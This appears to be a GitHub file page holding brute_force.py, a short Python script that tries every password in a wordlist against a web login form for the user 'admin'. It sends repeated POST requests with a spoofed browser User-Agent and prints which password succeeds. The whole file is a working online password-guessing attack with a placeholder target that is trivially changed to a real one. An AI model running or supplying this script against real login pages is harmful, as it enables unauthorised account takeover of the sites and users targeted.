-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathbrute_force.py
39 lines (30 loc) · 1.14 KB
/
brute_force.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
import requests
# URL of the login page
url = 'http://example.com/login'
# Target username for brute force attack
username = 'admin'
# Path to the wordlist file (list of passwords to try)
wordlist_path = 'passwords.txt'
# HTTP headers (if required)
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
}
# Load the password list
with open(wordlist_path, 'r') as wordlist:
passwords = wordlist.readlines()
# Iterate over each password in the wordlist
for password in passwords:
password = password.strip()
# POST data payload for the login form
data = {
'username': username,
'password': password
}
# Send the POST request to the login form
response = requests.post(url, data=data, headers=headers)
# Check the response to see if login was successful
if 'Invalid username or password' not in response.text: # Adjust this check based on the actual error message
print(f'[+] Successful login with password: {password}')
break
else:
print(f'[-] Failed login with password: {password}')